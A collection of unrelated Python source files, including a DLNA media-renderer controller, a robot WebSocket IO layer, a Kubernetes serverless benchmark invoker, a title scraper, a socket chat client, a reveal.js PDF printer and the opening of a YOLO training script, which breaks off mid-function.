def _payload_from_template(self, action, data, urn):
""" Assembly payload from template.
"""
fields = ''
for tag, value in data.items():
fields += '<{tag}>{value}</{tag}>'.format(tag=tag, value=value)
payload = """<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:{action} xmlns:u="{urn}">
{fields}
</u:{action}>
</s:Body>
</s:Envelope>""".format(action=action, urn=urn, fields=fields)
return payload
def _create_packet(self, action, data):
""" Create packet to send to device control url.
action -- control action
data -- dictionary with XML fields value
"""
if action in ["SetVolume", "SetMute", "GetVolume"]:
url = self.rendering_control_url
urn = URN_RenderingControl_Fmt.format(self.ssdp_version)
else:
url = self.control_url
urn = URN_AVTransport_Fmt.format(self.ssdp_version)
payload = self._payload_from_template(action=action, data=data, urn=urn)
packet = "\r\n".join([
'POST {} HTTP/1.1'.format(url),
'User-Agent: {}/{}'.format(__file__, __version__),
'Accept: */*',
'Content-Type: text/xml; charset="utf-8"',
'HOST: {}:{}'.format(self.ip, self.port),
'Content-Length: {}'.format(len(payload)),
'SOAPACTION: "{}#{}"'.format(urn, action),
'Connection: close',
'',
payload,
])
self.__logger.debug(packet)
return packet
def set_current_media(self, url, instance_id = 0):
""" Set media to playback.
url -- media url
instance_id -- device instance id
"""
packet = self._create_packet('SetAVTransportURI', {'InstanceID':instance_id, 'CurrentURI':url, 'CurrentURIMetaData':'' })
_send_tcp((self.ip, self.port), packet)
def play(self, instance_id = 0):
""" Play media that was already set as current.
instance_id -- device instance id
"""
packet = self._create_packet('Play', {'InstanceID': instance_id, 'Speed': 1})
_send_tcp((self.ip, self.port), packet)
def pause(self, instance_id = 0):
""" Pause media that is currently playing back.
instance_id -- device instance id
"""
packet = self._create_packet('Pause', {'InstanceID': instance_id, 'Speed':1})
_send_tcp((self.ip, self.port), packet)
def stop(self, instance_id = 0):
""" Stop media that is currently playing back.
instance_id -- device instance id
"""
packet = self._create_packet('Stop', {'InstanceID': instance_id, 'Speed': 1})
_send_tcp((self.ip, self.port), packet)
def seek(self, position, instance_id = 0):
"""
Seek position
"""
packet = self._create_packet('Seek', {'InstanceID':instance_id, 'Unit':'REL_TIME', 'Target': position })
_send_tcp((self.ip, self.port), packet)
def volume(self, volume=10, instance_id = 0):
""" Stop media that is currently playing back.
instance_id -- device instance id
"""
packet = self._create_packet('SetVolume', {'InstanceID': instance_id, 'DesiredVolume': volume, 'Channel': 'Master'})
_send_tcp((self.ip, self.port), packet)
def get_volume(self, instance_id = 0):
"""
get volume
"""
packet = self._create_packet('GetVolume', {'InstanceID':instance_id, 'Channel': 'Master'})
_send_tcp((self.ip, self.port), packet)
def mute(self, instance_id = 0):
""" Stop media that is currently playing back.
instance_id -- device instance id
"""
packet = self._create_packet('SetMute', {'InstanceID': instance_id, 'DesiredMute': '1', 'Channel': 'Master'})
_send_tcp((self.ip, self.port), packet)
def unmute(self, instance_id = 0):
""" Stop media that is currently playing back.
instance_id -- device instance id
"""
packet = self._create_packet('SetMute', {'InstanceID': instance_id, 'DesiredMute': '0', 'Channel': 'Master'})
_send_tcp((self.ip, self.port), packet)
def info(self, instance_id=0):
""" Transport info.
instance_id -- device instance id
"""
packet = self._create_packet('GetTransportInfo', {'InstanceID': instance_id})
return _send_tcp((self.ip, self.port), packet)
def media_info(self, instance_id=0):
""" Media info.
instance_id -- device instance id
"""
packet = self._create_packet('GetMediaInfo', {'InstanceID': instance_id})
return _send_tcp((self.ip, self.port), packet)
def position_info(self, instance_id=0):
""" Position info.
instance_id -- device instance id
"""
packet = self._create_packet('GetPositionInfo', {'InstanceID': instance_id})
return _send_tcp((self.ip, self.port), packet)
def set_next(self, url):
pass
def next(self):
pass
def discover(name = '', ip = '', timeout = 1, st = SSDP_ALL, mx = 3, ssdp_version = 1):
""" Discover UPnP devices in the local network.
name -- name or part of the name to filter devices
timeout -- timeout to perform discover
st -- st field of discovery packet
mx -- mx field of discovery packet
return -- list of DlnapDevice
"""
st = st.format(ssdp_version)
payload = "\r\n".join([
'M-SEARCH * HTTP/1.1',
'User-Agent: {}/{}'.format(__file__, __version__),
'HOST: {}:{}'.format(*SSDP_GROUP),
'Accept: */*',
'MAN: "ssdp:discover"',
'ST: {}'.format(st),
'MX: {}'.format(mx),
'',
''])
devices = []
with _send_udp(SSDP_GROUP, payload) as sock:
start = time.time()
while True:
if time.time() - start > timeout:
# timed out
break
r, w, x = select.select([sock], [], [sock], 1)
if sock in r:
data, addr = sock.recvfrom(1024)
if ip and addr[0] != ip:
continue
d = DlnapDevice(data, addr[0])
d.ssdp_version = ssdp_version
if d not in devices:
if not name or name is None or name.lower() in d.name.lower():
if not ip:
devices.append(d)
elif d.has_av_transport:
# no need in further searching by ip
devices.append(d)
break
elif sock in x:
raise Exception('Getting response failed')
else:
# Nothing to read
pass
return devices
#
# Signal of Ctrl+C
# =================================================================================================
def signal_handler(signal, frame):
print(' Got Ctrl + C, exit now!')
sys.exit(1)
signal.signal(signal.SIGINT, signal_handler)
if __name__ == '__main__':
import getopt
def usage():
print('{} [--ip <device ip>] [-d[evice] <name>] [--all] [-t[imeout] <seconds>] [--play <url>] [--pause] [--stop] [--proxy]'.format(__file__))
print(' --ip <device ip> - ip address for faster access to the known device')
print(' --device <device name or part of the name> - discover devices with this name as substring')
print(' --all - flag to discover all upnp devices, not only devices with AVTransport ability')
print(' --play <url> - set current url for play and start playback it. In case of url is empty - continue playing recent media.')
print(' --pause - pause current playback')
print(' --stop - stop current playback')
print(' --mute - mute playback')
print(' --unmute - unmute playback')
print(' --volume <vol> - set current volume for playback')
print(' --seek <position in HH:MM:SS> - set current position for playback')
print(' --timeout <seconds> - discover timeout')
print(' --ssdp-version <version> - discover devices by protocol version, default 1')
print(' --proxy - use local proxy on proxy port')
print(' --proxy-port <port number> - proxy port to listen incomming connections from devices, default 8000')
print(' --help - this help')
def version():
print(__version__)
try:
opts, args = getopt.getopt(sys.argv[1:], "hvd:t:i:", [ # information arguments
'help',
'version',
'log=',
# device arguments
'device=',
'ip=',
# action arguments
'play=',
'pause',
'stop',
'volume=',
'mute',
'unmute',
'seek=',
# discover arguments
'list',
'all',
'timeout=',
'ssdp-version=',
# transport info
'info',
'media-info',
# download proxy
'proxy',
'proxy-port='])
except getopt.GetoptError:
usage()
sys.exit(1)
device = ''
url = ''
vol = 10
position = '00:00:00'
timeout = 1
action = ''
logLevel = logging.WARN
compatibleOnly = True
ip = ''
proxy = False
proxy_port = 8000
ssdp_version = 1
for opt, arg in opts:
if opt in ('-h', '--help'):
usage()
sys.exit(0)
elif opt in ('-v', '--version'):
version()
sys.exit(0)
elif opt in ('--log'):
if arg.lower() == 'debug':
logLevel = logging.DEBUG
elif arg.lower() == 'info':
logLevel = logging.INFO
elif arg.lower() == 'warn':
logLevel = logging.WARN
elif opt in ('--all'):
compatibleOnly = False
elif opt in ('-d', '--device'):
device = arg
elif opt in ('-t', '--timeout'):
timeout = float(arg)
elif opt in ('--ssdp-version'):
ssdp_version = int(arg)
elif opt in ('-i', '--ip'):
ip = arg
compatibleOnly = False
timeout = 10
elif opt in ('--list'):
action = 'list'
elif opt in ('--play'):
action = 'play'
url = arg
elif opt in ('--pause'):
action = 'pause'
elif opt in ('--stop'):
action = 'stop'
elif opt in ('--volume'):
action = 'volume'
vol = arg
elif opt in ('--seek'):
action = 'seek'
position = arg
elif opt in ('--mute'):
action = 'mute'
elif opt in ('--unmute'):
action = 'unmute'
elif opt in ('--info'):
action = 'info'
elif opt in ('--media-info'):
action = 'media-info'
elif opt in ('--proxy'):
proxy = True
elif opt in ('--proxy-port'):
proxy_port = int(arg)
logging.basicConfig(level=logLevel)
st = URN_AVTransport_Fmt if compatibleOnly else SSDP_ALL
allDevices = discover(name=device, ip=ip, timeout=timeout, st=st, ssdp_version=ssdp_version)
if not allDevices:
print('No compatible devices found.')
sys.exit(1)
if action in ('', 'list'):
print('Discovered devices:')
for d in allDevices:
print(u' {} {}'.format('[a]' if d.has_av_transport else '[x]', d))
sys.exit(0)
d = allDevices[0]
print(d)
if url.lower().replace('https://', '').replace('www.', '').startswith('youtube.'):
import subprocess
process = subprocess.Popen(['youtube-dl', '-g', url], stdout = subprocess.PIPE)
url, err = process.communicate()
if url.lower().startswith('https://'):
proxy = True
if proxy:
ip = _get_serve_ip(d.ip)
t = threading.Thread(target=runProxy, kwargs={'ip' : ip, 'port' : proxy_port})
t.daemon = True
t.start()
time.sleep(2)
if action == 'play':
try:
d.stop()
url = 'http://{}:{}/{}'.format(ip, proxy_port, url) if proxy else url
d.set_current_media(url=url)
d.play()
except Exception as e:
print('Device is unable to play media.')
logging.warn('Play exception:\n{}'.format(traceback.format_exc()))
sys.exit(1)
elif action == 'pause':
d.pause()
elif action == 'stop':
d.stop()
elif action == 'volume':
d.volume(vol)
elif action == 'seek':
d.seek(position)
elif action == 'mute':
d.mute()
elif action == 'unmute':
d.unmute()
elif action == 'info':
print(d.info())
elif action == 'media-info':
print(d.media_info())
if proxy:
while running:
time.sleep(30)
|
keyboard_controller_test.py
|
#!/usr/bin/env python3
import threading
import queue
class NonBlockingInput:
def __init__(self, exit_condition):
self.exit_condition = exit_condition
self.input_queue = queue.Queue()
self.input_thread = threading.Thread(target=self.read_kbd_input, args=(), daemon=True)
self.input_thread.start()
def read_kbd_input(self):
done_queueing_input = False
while not done_queueing_input:
console_input = input()
self.input_queue.put(console_input)
if console_input.strip() == self.exit_condition:
done_queueing_input = True
def input_queued(self):
return_value = False
if self.input_queue.qsize() > 0:
return_value = True
return return_value
def input_get(self):
return_value = ""
if self.input_queue.qsize() > 0:
return_value = self.input_queue.get()
return return_value
if __name__ == '__main__':
NON_BLOCK_INPUT = NonBlockingInput(exit_condition='quit')
DONE_PROCESSING = False
INPUT_STR = ""
while not DONE_PROCESSING:
if NON_BLOCK_INPUT.input_queued():
INPUT_STR = NON_BLOCK_INPUT.input_get()
if INPUT_STR.strip() == "quit":
DONE_PROCESSING = True
else:
print("{}".format(INPUT_STR))
|
ws.py
|
"""WebSocket IO definition."""
import json
import asyncio
import websockets
import numpy as np
from threading import Thread, Event
from base64 import b64decode
from io import BytesIO
from PIL import Image
from .io import IO
class WsIO(IO):
"""WebSocket IO implementation."""
ws = None
def __init__(self, part_name):
"""Init an io attached to the given part."""
self.part_name = part_name
self.motors = []
self.disks = []
@classmethod
def shared_server(cls, part_name):
"""Create a new io with its ws server."""
io = cls(part_name)
if cls.ws is None:
cls.ws = WsServer()
cls.ws.run_in_background()
cls.ws.register(io)
return io
def find_module(self, module_name):
"""Get a specific module from the IO.
For the moment no module are really implemented. Only placeholders for code compatibility are provided.
"""
if module_name == 'force_gripper':
force_sensor = WsFakeForceSensor()
if self.part_name == 'left_arm.hand':
self.ws.left_force_sensor = force_sensor
elif self.part_name == 'right_arm.hand':
self.ws.right_force_sensor = force_sensor
return force_sensor
raise NotImplementedError
def find_dxl(self, dxl_name, dxl_config):
"""Get a specific dynamixel motor from the IO.
Only goal position is used atm.
"""
pos = dxl_config['offset'] * (-1 if dxl_config['orientation'] == 'indirect' else 1)
m = WsMotor(name=f'{self.part_name}.{dxl_name}', initial_position=pos)
self.motors.append(m)
self.ws.motors[m.name] = m
return m
def find_fan(self, fan_name):
"""Get a specific fan from its name."""
return FakeFan()
def find_orbita_disks(self):
"""Get a specific orbita module from the IO.
Not currently supported.
"""
bottomOrb = WsFakeOrbitaDisk(name=f'{self.part_name}.disk_bottom', initial_position=-60)
middleOrb = WsFakeOrbitaDisk(name=f'{self.part_name}.disk_middle', initial_position=-60)
topOrb = WsFakeOrbitaDisk(name=f'{self.part_name}.disk_top', initial_position=-60)
disks = [bottomOrb, middleOrb, topOrb]
self.disks += disks
return disks
def find_dual_camera(self, default_camera):
"""Retrieve a dual camera."""
cam = WsDualCamera(default_camera)
self.ws.cam = cam
return cam
def close(self):
"""Close the WS."""
self.ws.close()
class WsMotor(object):
"""Motor Placeholder.
Only the goal position (ie. target_rot_position) is currently used.
"""
def __init__(self, name, initial_position):
"""Init the fake motor."""
self.name = name
self.compliant = False
self.target_rot_position = initial_position
self.rot_position = initial_position
self.temperature = 20
class WsFakeOrbitaDisk(object):
"""Orbital disk placeholder."""
def __init__(self, name, initial_position):
"""Create fake Orbita disk."""
self.name = name
self.compliant = False
self._target_rot_position = initial_position
def __repr__(self) -> str:
"""Public Orbita disk string representation."""
return f'<Orbita "{self.name}" pos="{self.rot_position}>'
def setup(self):
"""Initialize the disk."""
pass
@property
def rot_position(self):
"""Get the current disk angle position (in deg.)."""
return self.target_rot_position
@property
def temperature(self):
"""Get the current temperature in C."""
return 37.2
@property
def target_rot_position(self):
"""Get the current target angle position (in deg.)."""
return self._target_rot_position
@target_rot_position.setter
def target_rot_position(self, new_pos):
"""Set a new target angle position (in deg.)."""
self._target_rot_position = new_pos
class WsFakeForceSensor(object):
"""Force Sensor placeholder.
Always return a nan as force.
"""
def __init__(self):
"""Init the fake force sensor."""
self.load = 0
class WsDualCamera(object):
"""Remote Camera."""
def __init__(self, default_camera):
"""Set remote camera up."""
self.set_active(default_camera)
self.frame = np.zeros((300, 480, 3), dtype=np.uint8)
@property
def active_side(self):
"""Get the active camera side."""
return self._camera_side
def set_active(self, camera_side):
"""Set one of the camera active (left or right)."""
self._camera_side = camera_side
def read(self):
"""Get latest received frame."""
return True, self.frame
def close(self):
"""Close the camera."""
pass
class WsServer(object):
"""WebSocket server, sync value from the modules with their equivalent from the client."""
def __init__(self, host='0.0.0.0', port=6171):
"""Prepare the ws server."""
self.host, self.port = host, port
self.running = Event()
self.parts = []
self.motors = {}
async def sync(self, websocket, path):
"""Sync loop that exchange modules state with the client."""
self.running.set()
while self.running.is_set():
if not websocket.open:
break
msg = json.dumps({
'motors': [
{'name': m.name, 'goal_position': m.target_rot_position}
for m in sum([p.motors for p in self.parts], [])
],
'disks': [
{'name': m.name, 'goal_position': m.target_rot_position}
for m in sum([p.disks for p in self.parts], [])
],
})
await websocket.send(msg.encode('UTF-8'))
resp = await websocket.recv()
state = json.loads(resp)
if hasattr(self, 'cam'):
eye = f'{self.cam.active_side}_eye'
if eye in state:
jpeg_data = b64decode(state[eye])
self.cam.frame = np.array(Image.open(BytesIO(jpeg_data)))
for m in state['motors']:
if m['name'] in self.motors:
self.motors[m['name']].rot_position = m['present_position']
if hasattr(self, 'left_force_sensor') and 'left_force_sensor' in state:
self.left_force_sensor.load = state['left_force_sensor']
if hasattr(self, 'right_force_sensor') and 'right_force_sensor' in state:
self.right_force_sensor.load = state['right_force_sensor']
def close(self):
"""Stop the sync loop."""
self.running.clear()
self.t.join()
def register(self, io):
"""Register a new io (and its module) to be synced."""
self.parts.append(io)
def run_forever(self):
"""Run the sync loop forever."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
serve = websockets.serve(self.sync, self.host, self.port)
loop.run_until_complete(serve)
loop.run_forever()
def run_in_background(self):
"""Run the sync loop forever in background."""
self.t = Thread(target=self.run_forever)
self.t.daemon = True
self.t.start()
class FakeFan(object):
"""Fake fan module for API consistensy."""
def on(self):
"""Do nothing."""
pass
def off(self):
"""Do nothing."""
pass
|
invoker.py
|
import os
import sys
import grpc
import json
import time
import argparse
from threading import *
from timeit import default_timer as now
from multiprocessing import Process, Manager
from trace_manager import TraceQuery, TraceManager
from kubernetes import config, client
from kubernetes.client import Configuration
from kubernetes.client.api import core_v1_api
import helloworld_pb2
import helloworld_pb2_grpc
# Endpoint file (used when traces are specified)
endpoint_file = 'benchmark_endpoints.txt'
# Limit traces to particular day(s) (between 1 to 14)
# If set to empty list, will process all
filter_days = [1]
def getArgs():
parser = argparse.ArgumentParser()
parser.add_argument('--endpoint', '-e', type=str, required=False,
dest='endpoint', default='http://localhost:80',
help='Endpoint to query')
parser.add_argument('--tracedir', '-d', type=str, required=False,
dest='tracedir', default=None,
help='Path to traces directory. If not specified, will use manually-inputted parameters.')
parser.add_argument('--minrange', '-q', type=int, required=False,
dest='minrange', default=1,
help='Minimum range to map traces to (Default: 1)')
parser.add_argument('--maxrange', '-r', type=int, required=False,
dest='maxrange', default=10,
help='Maximum range to map traces to (Default: 10)')
parser.add_argument('--numsec', '-s', type=int, required=False,
dest='numsec', default=5,
help='Number of seconds to simulate. -1 for all (Default: 5)')
parser.add_argument('--sorttraces', '-u', type=str, required=False,
dest='sorttraces', default="default",
choices=["mintime", "maxtime", "minmem", "maxmem", "default"],
help='Number of seconds to simulate. -1 for all (Default: 5)')
parser.add_argument('--executiontime', '-t', type=int, required=False,
dest='executiontime', default=0,
help='Execution time in ms (Default: 0 for skip)')
parser.add_argument('--objectsize', '-o', type=int, required=False,
dest='objectsize', default=0,
help='Object size in KB (Default: 0 for skip)')
parser.add_argument('--memoryallocate', '-m', type=int, required=False,
dest='memoryallocate', default=0,
help='Memory to allocate in KB (Default: 0 for skip)')
return parser.parse_args()
# Function for reading in endpoint from file
def readEndpoints():
endpoints_list = []
fd = open(endpoint_file, 'r')
for l in fd:
endpoints_list.append(l.strip())
fd.close()
return endpoints_list
# Function to monitor how many pods per-function are spun up
# Note that we treat the return_dict as a set
def podMonitorDaemon(return_dict, stop):
# Get kubernetes client
config.load_kube_config()
c = Configuration().get_default_copy()
Configuration.set_default(c)
core_v1 = core_v1_api.CoreV1Api()
while True:
curr_pods = core_v1.list_namespaced_pod("default")
for pod in curr_pods.items:
curr_name = pod.metadata.name
# Add to dictionary (treatign as a set)
return_dict[curr_name] = 1
if stop():
break
time.sleep(1)
# Set any of executiontime, objectsize, or memoryallocate to 0 to skip
def queryFunction(functionname, endpoint, executiontime, objectsize, memoryallocate, returndict):
with grpc.insecure_channel(endpoint) as channel:
stub = helloworld_pb2_grpc.GreeterStub(channel)
inputjson = {} # Json object to store input
if executiontime > 0:
inputjson['executiontime'] = int(executiontime)
if objectsize > 0:
inputjson['objectsize'] = int(objectsize)
if memoryallocate > 0:
inputjson['memoryallocate'] = int(memoryallocate)
input_str = json.dumps(inputjson)
# print('Querying for: %s' % input_str)
start = now()
response = stub.SayHello(helloworld_pb2.HelloRequest(name=input_str))
end = now()
e2e_time = (end - start) * 1e3
# With a manager dict, we cannot simply append to the list from within the dictionary.
next_list = returndict[functionname]
next_list.append(e2e_time)
returndict[functionname] = next_list
def runExperiment(queries_to_run, num_sec):
# If num_sec is negative, determine the number of queries to run
if num_sec < 0:
num_sec = len(queries_to_run[0].invocations)
# Track total number of times a function is invoked
func_invoc_dict = {}
# Shared dictionaries
manager = Manager()
daemon_measurement_dict = manager.dict()
func_measurement_dict = manager.dict()
# Launch daemon thread with a stop flag lambda
stop_flag = False
daemon = Thread(target=podMonitorDaemon, args=(daemon_measurement_dict, lambda: stop_flag))
daemon.setDaemon(True)
daemon.start()
for i in range(num_sec):
for q in queries_to_run:
num_invoc = int(q.invocations[i])
# Set up both dictionaries at the same time
if q.function_name not in func_measurement_dict:
func_measurement_dict[q.function_name] = []
func_invoc_dict[q.function_name] = 0
func_invoc_dict[q.function_name] += num_invoc
processes = [Process(target=queryFunction,
args=(q.function_name, q.endpoint, q.execution_time,
q.object_size, q.memory, func_measurement_dict))
for x in range(num_invoc)]
for p in processes:
p.start()
for p in processes:
p.join()
# Tell the daemon to exit
stop_flag = True
daemon.join()
return func_measurement_dict, daemon_measurement_dict, func_invoc_dict
def main(args):
tracedir = args.tracedir
min_range = args.minrange
max_range = args.maxrange
num_sec = args.numsec
sort_traces = args.sorttraces
if tracedir is not None:
endpoints = readEndpoints()
trace_manager = TraceManager(endpoints, tracedir, filter_days, sort_traces)
queries_to_run = trace_manager.generateQueries(min_range, max_range)
function_dict, daemon_dict, invoc_dict = runExperiment(queries_to_run, num_sec)
trace_manager.analyzeResults(function_dict, daemon_dict, invoc_dict)
else:
endpoint = args.endpoint
executiontime = args.executiontime
objectsize = args.objectsize
memoryallocate = args.memoryallocate
queryFunction(endpoint, executiontime, objectsize, memoryallocate)
if __name__ == '__main__':
main(getArgs())
|
distributedGetTitle.py
|
import time
import re
import requests
from lxml import etree
from multiprocessing import Process
from dbmongo import DBMongo
from dbredis import RedisDB
def get_response(url):
ret = requests.get(url, timeout=10)
site_encode = pick_charset(ret.text)
ret = ret.content.decode(site_encode)
html = etree.HTML(ret)
title = html.xpath('//title/text()')
return title[0]
def pick_charset(html):
"""
从文本中提取 meta charset
:param html:
:return:
"""
charset = None
m = re.compile('<meta .*(http-equiv="?Content-Type"?.*)?charset="?([a-zA-Z0-9_-]+)"?', re.I).search(html)
if m and m.lastindex == 2:
charset = m.group(2).lower()
return charset
def run():
mdb = DBMongo()
rdb = RedisDB()
while True:
url = rdb.fetch_one_element()
if url is None:
break
try:
title = get_response(url)
item = dict()
item['result'] = "{}\t{}".format(url.strip("'http://"), title.strip())
mdb.insert_2_xt(item, 'has')
except Exception as e:
item = dict()
item['url'] = url
mdb.insert_2_xt(item, 'loss')
if __name__ == '__main__':
for i in range(30):
p = Process(target=run)
p.start()
time.sleep(1)
print('执行主进程的内容了')
|
pressure.py
|
'''
'Windows' pressure sensor
---------------------
A dummy pressure sensor for phone emulation
'''
from plyer.facades import Pressure
from sensor_simulate import SemiRandomData
# from multiprocessing import Process, Manager
from threading import Thread
import time
import sys
class PressureSensorListener(object):
def __init__(self):
self.sensor = 'DummySensorObj'
# manager = Manager()
# self.values = manager.list([None, None, None])
self.values = [None, None, None]
# self.state = manager.Value('is_enabled', False)
self.state = False
def enable(self):
# self.state.value = True
self.state = True
# self.process_get_data = Process(target=self.get_data)
self.process_get_data = Thread(target=self.get_data)
self.process_get_data.start()
def disable(self):
# self.state.value = False
self.state = False
def get_data(self):
srd_obj = SemiRandomData(3, 3, 1000, .05)
# while self.state.value is True:
while self.state is True:
a, b, c = srd_obj.get_value()
self.values[0] = a
self.values[1] = b
self.values[2] = c
time.sleep(.01)
def monitor(self, time_length=10, frequency=1):
for i in range(time_length):
time.sleep(frequency)
sys.stdout.write(str(self.values) + '\n')
sys.stdout.flush()
class WinPressure(Pressure):
def __init__(self):
super(WinPressure, self).__init__()
self.bState = False
def _enable(self):
if (not self.bState):
self.listener = PressureSensorListener()
self.listener.enable()
self.bState = True
def _disable(self):
if (self.bState):
self.bState = False
self.listener.disable()
del self.listener
def _get_pressure(self):
if (self.bState):
return tuple(self.listener.values)
else:
return (None, None, None)
def __del__(self):
if(self.bState):
self._disable()
super(self.__class__, self).__del__()
def instance():
return WinPressure()
|
client.py
|
import socket
import threading
import random
def send_message():
try:
while True:
msg = input()
sock.send(bytes(name + ": " + msg, 'utf-8'))
if msg == '\leave chat':
sock.close()
break
except Exception:
pass
finally:
print('You left chat.')
def receive_message():
try:
while True:
data = sock.recv(1024).decode('utf-8')
if not data:
break
print(data)
sock.close()
except Exception:
pass
sock = socket.socket()
sock.connect(('localhost', 9090))
number = random.randint(0,1000)
name = "person" + str(number)
threading.Thread(target=send_message).start()
threading.Thread(target=receive_message).start()
|
printreveal_v2.py
|
#!/usr/bin/env python
# NOTE: This script requires a copy of decktape.js properly set up in the decktape-2.9.3 folder, along with ghostscript AND node.js WITH chalk installed
# It uses puppet, based on chrome, to print. It prints at a higher resolution than printreveal.py.
import sys
#if sys.version_info[0] < 3:
# import SimpleHTTPServer
#else:
# import http.server
#import SocketServer
#from threading import Thread
#import time
import subprocess
import argparse
import os
import posixpath
if sys.version_info[0] < 3:
import urllib
else:
import urllib.parse as urllib
#if sys.version_info[0] < 3:
# from SimpleHTTPServer import SimpleHTTPRequestHandler
# from BaseHTTPServer import HTTPServer
#else:
# from http.server import SimpleHTTPRequestHandler
# from http.server import HTTPServer
#class RootedHTTPServer(HTTPServer):
# def __init__(self, base_path, *args, **kwargs):
# HTTPServer.__init__(self, *args, **kwargs)
# self.RequestHandlerClass.base_path = base_path
#class RootedHTTPRequestHandler(SimpleHTTPRequestHandler):
# def translate_path(self, path):
# path = posixpath.normpath(urllib.unquote(path))
# words = path.split('/')
# words = filter(None, words)
# path = self.base_path
# for word in words:
# drive, word = os.path.splitdrive(word)
# head, word = os.path.split(word)
# if word in (os.curdir, os.pardir):
# continue
# path = os.path.join(path, word)
# return path
# Variables
#URL = 'localhost'
#PORT = 8000
cwd = os.path.dirname(os.path.abspath(__file__))
print(cwd)
# interpret input
args = argparse.ArgumentParser(description="Reveal.js parser")
args.add_argument('-f', '--file', dest='slidehtml', default='NA',
help='Location of html file to print')
args.add_argument('-c', '--compress', dest='compress', default=False, action='store_true')
args.add_argument('-n', '--number', dest='number', default='NA',
help='Number of slides to print')
args = args.parse_args()
slidehtml = os.path.abspath(args.slidehtml)
if '.html' not in slidehtml:
print('Please pass a valid reveal.js html file')
exit()
#if sys.platform == "win32":
# http_directory = '\\'.join(slidehtml.split('\\')[:-3])
#else:
# http_directory = '/'.join(slidehtml.split('/')[:-3])
http_directory = 'file://' + '/'.join(slidehtml.split('/')[:-3])
#server_address = ('', PORT)
#httpd = RootedHTTPServer(http_directory, server_address, RootedHTTPRequestHandler)
#sa = httpd.socket.getsockname()
print(slidehtml)
print(http_directory)
#print("Serving HTTP on", http_directory, "port", sa[1], "...")
#def simple_sever():
# httpd.serve_forever()
#simple_sever_T = Thread(target=simple_sever, name='simple_sever')
#simple_sever_T.daemon = True
#simple_sever_T.start()
# wait for server to be running
#while not simple_sever_T.is_alive():
# time.sleep(1)
# run print command and wait for finish
if sys.platform == "win32":
relativehtml = http_directory + '/' + '/'.join(slidehtml.split('\\')[-3:])
os.chdir(cwd + '/decktape-2.9.3-windows/') # sets the directory for print libraries
else:
relativehtml = http_directory + '/' + '/'.join(slidehtml.split('/')[-3:])
os.chdir(cwd + '/decktape-2.9.3-linux/') # sets the directory for print libraries
slidepdf = slidehtml[:-4] + 'pdf'
compressedpdf = slidepdf[:-4]+'-compress.pdf'
print('Printing from: ' + relativehtml)
print('Printing to: ' + slidepdf)
if args.number != 'NA':
try:
number = int(args.number)
number = ' --slides 1-' + str(number)+' '
except:
number = ''
else:
number = ''
# Print slides in full resolution
return_code = subprocess.call("node decktape.js "+ number +"-s 1536x1152 reveal " + relativehtml + ' \"' + slidepdf+"\"", shell=True)
if args.compress:
print('Compressing pdf')
if sys.platform == "win32":
return_code = subprocess.call("gswin64c -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -dPrinted=false -sOutputFile=\""+compressedpdf+"\" \""+slidepdf+"\"", shell=True)
else:
return_code = subprocess.call("ghostscript -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -dPrinted=false -sOutputFile=\""+compressedpdf+"\" \""+slidepdf+"\"", shell=True)
#httpd.shutdown()
#httpd.server_close()
|
train.py
|
import argparse
import logging
import math
import os
import random
import time
from pathlib import Path
from threading import Thread
from warnings import warn
import numpy as np
import torch.distributed as dist
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import yaml
from torch.cuda import amp
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import test # import test.py to get mAP after each epoch
from models.experimental import attempt_load
from models.yolo import Model
from utils.autoanchor import check_anchors
from utils.datasets import create_dataloader
from utils.general import labels_to_class_weights, increment_path, labels_to_image_weights, init_seeds, \
fitness, strip_optimizer, get_latest_run, check_dataset, check_file, check_git_status, check_img_size, \
check_requirements, print_mutation, set_logging, one_cycle
from utils.google_utils import attempt_download
from utils.loss import compute_loss
from utils.plots import plot_images, plot_labels, plot_results, plot_evolution
from utils.torch_utils import ModelEMA, select_device, intersect_dicts, torch_distributed_zero_first
logger = logging.getLogger(__name__)
try:
import wandb
except ImportError:
wandb = None
logger.info("Install Weights & Biases for experiment logging via 'pip install wandb' (recommended)")
def train(hyp, opt, device, tb_writer=None, wandb=None):
logger.info(f'Hyperparameters {hyp}')
save_dir, epochs, batch_size, total_batch_size, weights, rank = \
Path(opt.save_dir), opt.epochs, opt.batch_size, opt.total_batch_size, opt.weights, opt.global_rank
# Directories
wdir = save_dir / 'weights'
wdir.mkdir(parents=True, exist_ok=True) # make dir
last = wdir / 'last.pt'
best = wdir / 'best.pt'
results_file = save_dir / 'results.txt'
# Save run settings
with open(save_dir / 'hyp.yaml', 'w') as f:
yaml.dump(hyp, f, sort_keys=False)
with open(save_dir / 'opt.yaml', 'w') as f:
yaml.dump(vars(opt), f, sort_keys=False)
# Configure
plots = not opt.evolve # create plots
cuda = device.type != 'cpu'
init_seeds(2 + rank)
with open(opt.data) as f:
data_dict = yaml.load(f, Loader=yaml.FullLoader) # data dict
with torch_distributed_zero_first(rank):
check_dataset(data_dict) # check
train_path = data_dict['train']
test_path = data_dict['val']
nc = 1 if opt.single_cls else int(data_dict['nc']) # number of classes
names = ['item'] if opt.single_cls and len(data_dict['names']) != 1 else data_dict['names'] # class names
assert len(names) == nc, '%g names found for nc=%g dataset in %s' % (len(names), nc, opt.data) # check
# Model
pretrained = weights.endswith('.pt')
if pretrained:
with torch_distributed_zero_first(rank):
attempt_download(weights) # download if not found locally
ckpt = torch.load(weights, map_location=device) # load checkpoint
if hyp.get('anchors'):
ckpt['model'].yaml['anchors'] = round(hyp['anchors']) # force autoanchor
model = Model(opt.cfg or ckpt['model'].yaml, ch=3, nc=nc).to(device) # create
exclude = ['anchor'] if opt.cfg or hyp.get('anchors') else [] # exclude keys
state_dict = ckpt['model'].float().state_dict() # to FP32
state_dict = intersect_dicts(state_dict, model.state_dict(), exclude=exclude) # intersect
model.load_state_dict(state_dict, strict=False) # load
logger.info('Transferred %g/%g items from %s' % (len(state_dict), len(model.state_dict()), weights)) # report
else:
